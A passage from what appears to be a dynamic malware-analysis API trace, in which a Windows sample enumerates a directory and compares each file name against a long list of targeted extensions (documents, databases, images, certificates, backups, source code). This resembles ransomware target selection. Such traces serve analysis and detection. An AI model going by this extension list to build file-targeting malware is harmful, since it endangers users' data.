(lpString=".p7b") returned 4 [0167.827] lstrcmpiW (lpString1=".p7b", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".p7c") returned 4 [0167.827] lstrcmpiW (lpString1=".p7c", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pam") returned 4 [0167.827] lstrcmpiW (lpString1=".pam", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pbm") returned 4 [0167.827] lstrcmpiW (lpString1=".pbm", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pct") returned 4 [0167.827] lstrcmpiW (lpString1=".pct", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pcx") returned 4 [0167.827] lstrcmpiW (lpString1=".pcx", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pdd") returned 4 [0167.827] lstrcmpiW (lpString1=".pdd", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pdf") returned 4 [0167.827] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pdp") returned 4 [0167.827] lstrcmpiW (lpString1=".pdp", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pef") returned 4 [0167.827] lstrcmpiW (lpString1=".pef", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pem") returned 4 [0167.827] lstrcmpiW (lpString1=".pem", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pff") returned 4 [0167.827] lstrcmpiW (lpString1=".pff", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pfm") returned 4 [0167.827] lstrcmpiW (lpString1=".pfm", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pfx") returned 4 [0167.827] lstrcmpiW (lpString1=".pfx", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".pgm") returned 4 [0167.827] lstrcmpiW (lpString1=".pgm", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".php") returned 4 [0167.827] lstrcmpiW (lpString1=".php", lpString2=".rtf") returned -1 [0167.827] lstrlenW (lpString=".php3") returned 5 [0167.827] lstrcmpiW (lpString1=".php3", lpString2="a.rtf") returned -1 [0167.827] lstrlenW (lpString=".php4") returned 5 [0167.828] lstrcmpiW (lpString1=".php4", lpString2="a.rtf") returned -1 [0167.828] lstrlenW (lpString=".php5") returned 5 [0167.828] lstrcmpiW (lpString1=".php5", lpString2="a.rtf") returned -1 [0167.828] lstrlenW (lpString=".phtml") returned 6 [0167.828] lstrcmpiW (lpString1=".phtml", lpString2="la.rtf") returned -1 [0167.828] lstrlenW (lpString=".pict") returned 5 [0167.828] lstrcmpiW (lpString1=".pict", lpString2="a.rtf") returned -1 [0167.828] lstrlenW (lpString=".pl") returned 3 [0167.828] lstrcmpiW (lpString1=".pl", lpString2="rtf") returned -1 [0167.828] lstrlenW (lpString=".pls") returned 4 [0167.828] lstrcmpiW (lpString1=".pls", lpString2=".rtf") returned -1 [0167.828] lstrlenW (lpString=".pm") returned 3 [0167.828] lstrcmpiW (lpString1=".pm", lpString2="rtf") returned -1 [0167.828] lstrlenW (lpString=".png") returned 4 [0167.828] lstrcmpiW (lpString1=".png", lpString2=".rtf") returned -1 [0167.828] lstrlenW (lpString=".pnm") returned 4 [0167.828] lstrcmpiW (lpString1=".pnm", lpString2=".rtf") returned -1 [0167.828] lstrlenW (lpString=".pot") returned 4 [0167.828] lstrcmpiW (lpString1=".pot", lpString2=".rtf") returned -1 [0167.828] lstrlenW (lpString=".potm") returned 5 [0167.828] lstrcmpiW (lpString1=".potm", lpString2="a.rtf") returned -1 [0167.828] lstrlenW (lpString=".potx") returned 5 [0167.828] lstrcmpiW (lpString1=".potx", lpString2="a.rtf") returned -1 [0167.828] lstrlenW (lpString=".ppa") returned 4 [0167.828] lstrcmpiW (lpString1=".ppa", lpString2=".rtf") returned -1 [0167.828] lstrlenW (lpString=".ppam") returned 5 [0167.828] lstrcmpiW (lpString1=".ppam", lpString2="a.rtf") returned -1 [0167.828] lstrlenW (lpString=".ppm") returned 4 [0167.828] lstrcmpiW (lpString1=".ppm", lpString2=".rtf") returned -1 [0167.828] lstrlenW (lpString=".pps") returned 4 [0167.828] lstrcmpiW (lpString1=".pps", lpString2=".rtf") returned -1 [0167.828] lstrlenW (lpString=".ppsm") returned 5 [0167.828] lstrcmpiW (lpString1=".ppsm", lpString2="a.rtf") returned -1 [0167.828] lstrlenW (lpString=".ppt") returned 4 [0167.828] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0167.828] lstrlenW (lpString=".pptm") returned 5 [0167.829] lstrcmpiW (lpString1=".pptm", lpString2="a.rtf") returned -1 [0167.829] lstrlenW (lpString=".pptx") returned 5 [0167.829] lstrcmpiW (lpString1=".pptx", lpString2="a.rtf") returned -1 [0167.829] lstrlenW (lpString=".prn") returned 4 [0167.829] lstrcmpiW (lpString1=".prn", lpString2=".rtf") returned -1 [0167.829] lstrlenW (lpString=".ps") returned 3 [0167.829] lstrcmpiW (lpString1=".ps", lpString2="rtf") returned -1 [0167.829] lstrlenW (lpString=".psb") returned 4 [0167.829] lstrcmpiW (lpString1=".psb", lpString2=".rtf") returned -1 [0167.829] lstrlenW (lpString=".psd") returned 4 [0167.829] lstrcmpiW (lpString1=".psd", lpString2=".rtf") returned -1 [0167.829] lstrlenW (lpString=".pst") returned 4 [0167.829] lstrcmpiW (lpString1=".pst", lpString2=".rtf") returned -1 [0167.829] lstrlenW (lpString=".ptx") returned 4 [0167.829] lstrcmpiW (lpString1=".ptx", lpString2=".rtf") returned -1 [0167.829] lstrlenW (lpString=".pub") returned 4 [0167.829] lstrcmpiW (lpString1=".pub", lpString2=".rtf") returned -1 [0167.829] lstrlenW (lpString=".pwm") returned 4 [0167.829] lstrcmpiW (lpString1=".pwm", lpString2=".rtf") returned -1 [0167.829] lstrlenW (lpString=".pxr") returned 4 [0167.829] lstrcmpiW (lpString1=".pxr", lpString2=".rtf") returned -1 [0167.829] lstrlenW (lpString=".py") returned 3 [0167.829] lstrcmpiW (lpString1=".py", lpString2="rtf") returned -1 [0167.829] lstrlenW (lpString=".qt") returned 3 [0167.829] lstrcmpiW (lpString1=".qt", lpString2="rtf") returned -1 [0167.829] lstrlenW (lpString=".r3d") returned 4 [0167.829] lstrcmpiW (lpString1=".r3d", lpString2=".rtf") returned -1 [0167.829] lstrlenW (lpString=".raf") returned 4 [0167.829] lstrcmpiW (lpString1=".raf", lpString2=".rtf") returned -1 [0167.829] lstrlenW (lpString=".rar") returned 4 [0167.829] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0167.829] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0167.830] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0167.830] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0167.830] FindClose (in: hFindFile=0x8021d8 | out: hFindFile=0x8021d8) returned 1 [0167.830] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0167.830] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1029", cAlternateFileName="")) returned 1 [0167.830] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0167.830] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029") returned 26 [0167.830] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802558 [0168.745] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.745] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0168.745] lstrlenW (lpString="eula.rtf") returned 8 [0168.745] lstrlenW (lpString=".1cd") returned 4 [0168.745] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0168.745] lstrlenW (lpString=".3ds") returned 4 [0168.745] lstrcmpiW (lpString1=".3ds", lpString2=".rtf") returned -1 [0168.745] lstrlenW (lpString=".3fr") returned 4 [0168.745] lstrcmpiW (lpString1=".3fr", lpString2=".rtf") returned -1 [0168.745] lstrlenW (lpString=".3g2") returned 4 [0168.745] lstrcmpiW (lpString1=".3g2", lpString2=".rtf") returned -1 [0168.745] lstrlenW (lpString=".3gp") returned 4 [0168.745] lstrcmpiW (lpString1=".3gp", lpString2=".rtf") returned -1 [0168.745] lstrlenW (lpString=".7z") returned 3 [0168.745] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0168.745] lstrlenW (lpString=".accda") returned 6 [0168.745] lstrcmpiW (lpString1=".accda", lpString2="la.rtf") returned -1 [0168.745] lstrlenW (lpString=".accdb") returned 6 [0168.746] lstrcmpiW (lpString1=".accdb", lpString2="la.rtf") returned -1 [0168.746] lstrlenW (lpString=".accdc") returned 6 [0168.746] lstrcmpiW (lpString1=".accdc", lpString2="la.rtf") returned -1 [0168.746] lstrlenW (lpString=".accde") returned 6 [0168.746] lstrcmpiW (lpString1=".accde", lpString2="la.rtf") returned -1 [0168.746] lstrlenW (lpString=".accdt") returned 6 [0168.746] lstrcmpiW (lpString1=".accdt", lpString2="la.rtf") returned -1 [0168.746] lstrlenW (lpString=".accdw") returned 6 [0168.746] lstrcmpiW (lpString1=".accdw", lpString2="la.rtf") returned -1 [0168.746] lstrlenW (lpString=".adb") returned 4 [0168.746] lstrcmpiW (lpString1=".adb", lpString2=".rtf") returned -1 [0168.746] lstrlenW (lpString=".adp") returned 4 [0168.746] lstrcmpiW (lpString1=".adp", lpString2=".rtf") returned -1 [0168.746] lstrlenW (lpString=".ai") returned 3 [0168.746] lstrcmpiW (lpString1=".ai", lpString2="rtf") returned -1 [0168.746] lstrlenW (lpString=".ai3") returned 4 [0168.746] lstrcmpiW (lpString1=".ai3", lpString2=".rtf") returned -1 [0168.746] lstrlenW (lpString=".ai4") returned 4 [0168.746] lstrcmpiW (lpString1=".ai4", lpString2=".rtf") returned -1 [0168.746] lstrlenW (lpString=".ai5") returned 4 [0168.746] lstrcmpiW (lpString1=".ai5", lpString2=".rtf") returned -1 [0168.746] lstrlenW (lpString=".ai6") returned 4 [0168.746] lstrcmpiW (lpString1=".ai6", lpString2=".rtf") returned -1 [0168.746] lstrlenW (lpString=".ai7") returned 4 [0168.746] lstrcmpiW (lpString1=".ai7", lpString2=".rtf") returned -1 [0168.746] lstrlenW (lpString=".ai8") returned 4 [0168.746] lstrcmpiW (lpString1=".ai8", lpString2=".rtf") returned -1 [0168.747] lstrlenW (lpString=".anim") returned 5 [0168.747] lstrcmpiW (lpString1=".anim", lpString2="a.rtf") returned -1 [0168.747] lstrlenW (lpString=".arw") returned 4 [0168.747] lstrcmpiW (lpString1=".arw", lpString2=".rtf") returned -1 [0168.747] lstrlenW (lpString=".as") returned 3 [0168.747] lstrcmpiW (lpString1=".as", lpString2="rtf") returned -1 [0168.747] lstrlenW (lpString=".asa") returned 4 [0168.747] lstrcmpiW (lpString1=".asa", lpString2=".rtf") returned -1 [0168.747] lstrlenW (lpString=".asc") returned 4 [0168.747] lstrcmpiW (lpString1=".asc", lpString2=".rtf") returned -1 [0168.747] lstrlenW (lpString=".ascx") returned 5 [0168.747] lstrcmpiW (lpString1=".ascx", lpString2="a.rtf") returned -1 [0168.747] lstrlenW (lpString=".asm") returned 4 [0168.747] lstrcmpiW (lpString1=".asm", lpString2=".rtf") returned -1 [0168.747] lstrlenW (lpString=".asmx") returned 5 [0168.747] lstrcmpiW (lpString1=".asmx", lpString2="a.rtf") returned -1 [0168.747] lstrlenW (lpString=".asp") returned 4 [0168.747] lstrcmpiW (lpString1=".asp", lpString2=".rtf") returned -1 [0168.747] lstrlenW (lpString=".aspx") returned 5 [0168.747] lstrcmpiW (lpString1=".aspx", lpString2="a.rtf") returned -1 [0168.747] lstrlenW (lpString=".asr") returned 4 [0168.747] lstrcmpiW (lpString1=".asr", lpString2=".rtf") returned -1 [0168.747] lstrlenW (lpString=".asx") returned 4 [0168.747] lstrcmpiW (lpString1=".asx", lpString2=".rtf") returned -1 [0168.748] lstrlenW (lpString=".avi") returned 4 [0168.748] lstrcmpiW (lpString1=".avi", lpString2=".rtf") returned -1 [0168.748] lstrlenW (lpString=".avs") returned 4 [0168.748] lstrcmpiW (lpString1=".avs", lpString2=".rtf") returned -1 [0168.748] lstrlenW (lpString=".backup") returned 7 [0168.748] lstrcmpiW (lpString1=".backup", lpString2="ula.rtf") returned -1 [0168.748] lstrlenW (lpString=".bak") returned 4 [0168.748] lstrcmpiW (lpString1=".bak", lpString2=".rtf") returned -1 [0168.748] lstrlenW (lpString=".bay") returned 4 [0168.748] lstrcmpiW (lpString1=".bay", lpString2=".rtf") returned -1 [0168.748] lstrlenW (lpString=".bd") returned 3 [0168.748] lstrcmpiW (lpString1=".bd", lpString2="rtf") returned -1 [0168.748] lstrlenW (lpString=".bin") returned 4 [0168.748] lstrcmpiW (lpString1=".bin", lpString2=".rtf") returned -1 [0168.748] lstrlenW (lpString=".bmp") returned 4 [0168.748] lstrcmpiW (lpString1=".bmp", lpString2=".rtf") returned -1 [0168.748] lstrlenW (lpString=".bz2") returned 4 [0168.748] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0168.748] lstrlenW (lpString=".c") returned 2 [0168.748] lstrcmpiW (lpString1=".c", lpString2="tf") returned -1 [0168.748] lstrlenW (lpString=".cdr") returned 4 [0168.748] lstrcmpiW (lpString1=".cdr", lpString2=".rtf") returned -1 [0168.748] lstrlenW (lpString=".cer") returned 4 [0168.748] lstrcmpiW (lpString1=".cer", lpString2=".rtf") returned -1 [0168.748] lstrlenW (lpString=".cf") returned 3 [0168.748] lstrcmpiW (lpString1=".cf", lpString2="rtf") returned -1 [0168.748] lstrlenW (lpString=".cfc") returned 4 [0168.749] lstrcmpiW (lpString1=".cfc", lpString2=".rtf") returned -1 [0168.749] lstrlenW (lpString=".cfm") returned 4 [0168.749] lstrcmpiW (lpString1=".cfm", lpString2=".rtf") returned -1 [0168.749] lstrlenW (lpString=".cfml") returned 5 [0168.749] lstrcmpiW (lpString1=".cfml", lpString2="a.rtf") returned -1 [0168.749] lstrlenW (lpString=".cfu") returned 4 [0168.749] lstrcmpiW (lpString1=".cfu", lpString2=".rtf") returned -1 [0168.749] lstrlenW (lpString=".chm") returned 4 [0168.749] lstrcmpiW (lpString1=".chm", lpString2=".rtf") returned -1 [0168.749] lstrlenW (lpString=".cin") returned 4 [0168.749] lstrcmpiW (lpString1=".cin", lpString2=".rtf") returned -1 [0168.749] lstrlenW (lpString=".class") returned 6 [0168.749] lstrcmpiW (lpString1=".class", lpString2="la.rtf") returned -1 [0168.749] lstrlenW (lpString=".clx") returned 4 [0168.749] lstrcmpiW (lpString1=".clx", lpString2=".rtf") returned -1 [0168.749] lstrlenW (lpString=".config") returned 7 [0168.749] lstrcmpiW (lpString1=".config", lpString2="ula.rtf") returned -1 [0168.749] lstrlenW (lpString=".cpp") returned 4 [0168.749] lstrcmpiW (lpString1=".cpp", lpString2=".rtf") returned -1 [0168.749] lstrlenW (lpString=".cr2") returned 4 [0168.749] lstrcmpiW (lpString1=".cr2", lpString2=".rtf") returned -1 [0168.749] lstrlenW (lpString=".crt") returned 4 [0168.749] lstrcmpiW (lpString1=".crt", lpString2=".rtf") returned -1 [0168.749] lstrlenW (lpString=".crw") returned 4 [0168.749] lstrcmpiW (lpString1=".crw", lpString2=".rtf") returned -1 [0168.749] lstrlenW (lpString=".cs") returned 3 [0168.750] lstrcmpiW (lpString1=".cs", lpString2="rtf") returned -1 [0168.750] lstrlenW (lpString=".css") returned 4 [0168.750] lstrcmpiW (lpString1=".css", lpString2=".rtf") returned -1 [0168.750] lstrlenW (lpString=".csv") returned 4 [0168.750] lstrcmpiW (lpString1=".csv", lpString2=".rtf") returned -1 [0168.750] lstrlenW (lpString=".cub") returned 4 [0168.750] lstrcmpiW (lpString1=".cub", lpString2=".rtf") returned -1 [0168.750] lstrlenW (lpString=".dae") returned 4 [0168.750] lstrcmpiW (lpString1=".dae", lpString2=".rtf") returned -1 [0168.750] lstrlenW (lpString=".dat") returned 4 [0168.750] lstrcmpiW (lpString1=".dat", lpString2=".rtf") returned -1 [0168.750] lstrlenW (lpString=".db") returned 3 [0168.750] lstrcmpiW (lpString1=".db", lpString2="rtf") returned -1 [0168.750] lstrlenW (lpString=".dbf") returned 4 [0168.750] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0168.750] lstrlenW (lpString=".dbx") returned 4 [0168.750] lstrcmpiW (lpString1=".dbx", lpString2=".rtf") returned -1 [0168.750] lstrlenW (lpString=".dc3") returned 4 [0168.750] lstrcmpiW (lpString1=".dc3", lpString2=".rtf") returned -1 [0168.750] lstrlenW (lpString=".dcm") returned 4 [0168.750] lstrcmpiW (lpString1=".dcm", lpString2=".rtf") returned -1 [0168.750] lstrlenW (lpString=".dcr") returned 4 [0168.750] lstrcmpiW (lpString1=".dcr", lpString2=".rtf") returned -1 [0168.750] lstrlenW (lpString=".der") returned 4 [0168.750] lstrcmpiW (lpString1=".der", lpString2=".rtf") returned -1 [0168.750] lstrlenW (lpString=".dib") returned 4 [0168.751] lstrcmpiW (lpString1=".dib", lpString2=".rtf") returned -1 [0168.751] lstrlenW (lpString=".dic") returned 4 [0168.751] lstrcmpiW (lpString1=".dic", lpString2=".rtf") returned -1 [0168.751] lstrlenW (lpString=".dif") returned 4 [0168.751] lstrcmpiW (lpString1=".dif", lpString2=".rtf") returned -1 [0168.751] lstrlenW (lpString=".divx") returned 5 [0168.751] lstrcmpiW (lpString1=".divx", lpString2="a.rtf") returned -1 [0168.751] lstrlenW (lpString=".djvu") returned 5 [0168.751] lstrcmpiW (lpString1=".djvu", lpString2="a.rtf") returned -1 [0168.751] lstrlenW (lpString=".dng") returned 4 [0168.751] lstrcmpiW (lpString1=".dng", lpString2=".rtf") returned -1 [0168.751] lstrlenW (lpString=".doc") returned 4 [0168.751] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0168.751] lstrlenW (lpString=".docm") returned 5 [0168.751] lstrcmpiW (lpString1=".docm", lpString2="a.rtf") returned -1 [0168.751] lstrlenW (lpString=".docx") returned 5 [0168.751] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0168.751] lstrlenW (lpString=".dot") returned 4 [0168.751] lstrcmpiW (lpString1=".dot", lpString2=".rtf") returned -1 [0168.751] lstrlenW (lpString=".dotm") returned 5 [0168.751] lstrcmpiW (lpString1=".dotm", lpString2="a.rtf") returned -1 [0168.751] lstrlenW (lpString=".dotx") returned 5 [0168.751] lstrcmpiW (lpString1=".dotx", lpString2="a.rtf") returned -1 [0168.751] lstrlenW (lpString=".dpx") returned 4 [0168.751] lstrcmpiW (lpString1=".dpx", lpString2=".rtf") returned -1 [0168.751] lstrlenW (lpString=".dqy") returned 4 [0168.751] lstrcmpiW (lpString1=".dqy", lpString2=".rtf") returned -1 [0168.752] lstrlenW (lpString=".dsn") returned 4 [0168.752] lstrcmpiW (lpString1=".dsn", lpString2=".rtf") returned -1 [0168.752] lstrlenW (lpString=".dt") returned 3 [0168.752] lstrcmpiW (lpString1=".dt", lpString2="rtf") returned -1 [0168.752] lstrlenW (lpString=".dtd") returned 4 [0168.752] lstrcmpiW (lpString1=".dtd", lpString2=".rtf") returned -1 [0168.752] lstrlenW (lpString=".dwg") returned 4 [0168.752] lstrcmpiW (lpString1=".dwg", lpString2=".rtf") returned -1 [0168.752] lstrlenW (lpString=".dwt") returned 4 [0168.752] lstrcmpiW (lpString1=".dwt", lpString2=".rtf") returned -1 [0168.752] lstrlenW (lpString=".dx") returned 3 [0168.752] lstrcmpiW (lpString1=".dx", lpString2="rtf") returned -1 [0168.752] lstrlenW (lpString=".dxf") returned 4 [0168.752] lstrcmpiW (lpString1=".dxf", lpString2=".rtf") returned -1 [0168.752] lstrlenW (lpString=".edml") returned 5 [0168.752] lstrcmpiW (lpString1=".edml", lpString2="a.rtf") returned -1 [0168.752] lstrlenW (lpString=".efd") returned 4 [0168.752] lstrcmpiW (lpString1=".efd", lpString2=".rtf") returned -1 [0168.752] lstrlenW (lpString=".elf") returned 4 [0168.752] lstrcmpiW (lpString1=".elf", lpString2=".rtf") returned -1 [0168.752] lstrlenW (lpString=".emf") returned 4 [0168.752] lstrcmpiW (lpString1=".emf", lpString2=".rtf") returned -1 [0168.752] lstrlenW (lpString=".emz") returned 4 [0168.752] lstrcmpiW (lpString1=".emz", lpString2=".rtf") returned -1 [0168.752] lstrlenW (lpString=".epf") returned 4 [0168.752] lstrcmpiW (lpString1=".epf", lpString2=".rtf") returned -1 [0168.752] lstrlenW (lpString=".eps") returned 4 [0168.752] lstrcmpiW (lpString1=".eps", lpString2=".rtf") returned -1 [0168.753] lstrlenW (lpString=".epsf") returned 5 [0168.753] lstrcmpiW (lpString1=".epsf", lpString2="a.rtf") returned -1 [0168.753] lstrlenW (lpString=".epsp") returned 5 [0168.753] lstrcmpiW (lpString1=".epsp", lpString2="a.rtf") returned -1 [0168.753] lstrlenW (lpString=".erf") returned 4 [0168.753] lstrcmpiW (lpString1=".erf", lpString2=".rtf") returned -1 [0168.753] lstrlenW (lpString=".exr") returned 4 [0168.753] lstrcmpiW (lpString1=".exr", lpString2=".rtf") returned -1 [0168.753] lstrlenW (lpString=".f4v") returned 4 [0168.753] lstrcmpiW (lpString1=".f4v", lpString2=".rtf") returned -1 [0168.753] lstrlenW (lpString=".fido") returned 5 [0168.753] lstrcmpiW (lpString1=".fido", lpString2="a.rtf") returned -1 [0168.753] lstrlenW (lpString=".flm") returned 4 [0168.753] lstrcmpiW (lpString1=".flm", lpString2=".rtf") returned -1 [0168.753] lstrlenW (lpString=".flv") returned 4 [0168.753] lstrcmpiW (lpString1=".flv", lpString2=".rtf") returned -1 [0168.753] lstrlenW (lpString=".frm") returned 4 [0168.753] lstrcmpiW (lpString1=".frm", lpString2=".rtf") returned -1 [0168.753] lstrlenW (lpString=".fxg") returned 4 [0168.753] lstrcmpiW (lpString1=".fxg", lpString2=".rtf") returned -1 [0168.753] lstrlenW (lpString=".geo") returned 4 [0168.753] lstrcmpiW (lpString1=".geo", lpString2=".rtf") returned -1 [0168.753] lstrlenW (lpString=".gif") returned 4 [0168.753] lstrcmpiW (lpString1=".gif", lpString2=".rtf") returned -1 [0168.753] lstrlenW (lpString=".grs") returned 4 [0168.753] lstrcmpiW (lpString1=".grs", lpString2=".rtf") returned -1 [0168.754] lstrlenW (lpString=".gz") returned 3 [0168.754] lstrcmpiW (lpString1=".gz", lpString2="rtf") returned -1 [0168.754] lstrlenW (lpString=".h") returned 2 [0168.754] lstrcmpiW (lpString1=".h", lpString2="tf") returned -1 [0168.754] lstrlenW (lpString=".hdr") returned 4 [0168.754] lstrcmpiW (lpString1=".hdr", lpString2=".rtf") returned -1 [0168.754] lstrlenW (lpString=".hpp") returned 4 [0168.754] lstrcmpiW (lpString1=".hpp", lpString2=".rtf") returned -1 [0168.754] lstrlenW (lpString=".hta") returned 4 [0168.754] lstrcmpiW (lpString1=".hta", lpString2=".rtf") returned -1 [0168.754] lstrlenW (lpString=".htc") returned 4 [0168.754] lstrcmpiW (lpString1=".htc", lpString2=".rtf") returned -1 [0168.754] lstrlenW (lpString=".htm") returned 4 [0168.754] lstrcmpiW (lpString1=".htm", lpString2=".rtf") returned -1 [0168.754] lstrlenW (lpString=".html") returned 5 [0168.754] lstrcmpiW (lpString1=".html", lpString2="a.rtf") returned -1 [0168.754] lstrlenW (lpString=".icb") returned 4 [0168.754] lstrcmpiW (lpString1=".icb", lpString2=".rtf") returned -1 [0168.754] lstrlenW (lpString=".ics") returned 4 [0168.754] lstrcmpiW (lpString1=".ics", lpString2=".rtf") returned -1 [0168.754] lstrlenW (lpString=".iff") returned 4 [0168.754] lstrcmpiW (lpString1=".iff", lpString2=".rtf") returned -1 [0168.754] lstrlenW (lpString=".inc") returned 4 [0168.754] lstrcmpiW (lpString1=".inc", lpString2=".rtf") returned -1 [0168.754] lstrlenW (lpString=".indd") returned 5 [0168.754] lstrcmpiW (lpString1=".indd", lpString2="a.rtf") returned -1 [0168.754] lstrlenW (lpString=".ini") returned 4 [0168.754] lstrcmpiW (lpString1=".ini", lpString2=".rtf") returned -1 [0168.755] lstrlenW (lpString=".iqy") returned 4 [0168.755] lstrcmpiW (lpString1=".iqy", lpString2=".rtf") returned -1 [0168.755] lstrlenW (lpString=".j2c") returned 4 [0168.755] lstrcmpiW (lpString1=".j2c", lpString2=".rtf") returned -1 [0168.755] lstrlenW (lpString=".j2k") returned 4 [0168.755] lstrcmpiW (lpString1=".j2k", lpString2=".rtf") returned -1 [0168.755] lstrlenW (lpString=".java") returned 5 [0168.755] lstrcmpiW (lpString1=".java", lpString2="a.rtf") returned -1 [0168.755] lstrlenW (lpString=".jp2") returned 4 [0168.755] lstrcmpiW (lpString1=".jp2", lpString2=".rtf") returned -1 [0168.755] lstrlenW (lpString=".jpc") returned 4 [0168.755] lstrcmpiW (lpString1=".jpc", lpString2=".rtf") returned -1 [0168.755] lstrlenW (lpString=".jpe") returned 4 [0168.755] lstrcmpiW (lpString1=".jpe", lpString2=".rtf") returned -1 [0168.755] lstrlenW (lpString=".jpeg") returned 5 [0168.755] lstrcmpiW (lpString1=".jpeg", lpString2="a.rtf") returned -1 [0168.755] lstrlenW (lpString=".jpf") returned 4 [0168.755] lstrcmpiW (lpString1=".jpf", lpString2=".rtf") returned -1 [0168.755] lstrlenW (lpString=".jpg") returned 4 [0168.755] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0168.755] lstrlenW (lpString=".jpx") returned 4 [0168.755] lstrcmpiW (lpString1=".jpx", lpString2=".rtf") returned -1 [0168.755] lstrlenW (lpString=".js") returned 3 [0168.755] lstrcmpiW (lpString1=".js", lpString2="rtf") returned -1 [0168.755] lstrlenW 